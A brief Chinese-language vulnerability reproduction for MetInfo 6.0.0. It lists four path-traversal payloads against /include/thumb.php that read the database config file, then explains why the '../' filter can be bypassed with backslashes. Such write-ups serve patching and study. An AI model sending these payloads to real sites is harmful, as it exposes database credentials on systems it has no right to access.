metinfo 任意文件读取漏洞复现
抓包metinfo6.0.0版本
漏洞利用点 /include/thumb.php
第一次利用
/include/thumb.php?dir=..././http/..././config/config_db.php
第二次利用
/include/thumb.php?dir=.....///http/.....///config/config_db.php
第三次利用
/include/thumb.php?dir=http/.....///.....///config/config_db.php
第四次利用
/include/thumb.php?dir=http\..\..\config\config_db.php
成功利用漏洞
简要解释漏洞产生的原因
从代码分析得知dir直接由_GET[‘dir’]传递进来,设置了过滤条件,但是只设置了过滤"../"和“./”和请求头部是“http”开始,这样的过滤显然太简单了,我们可以用.\进行绕过构造payload。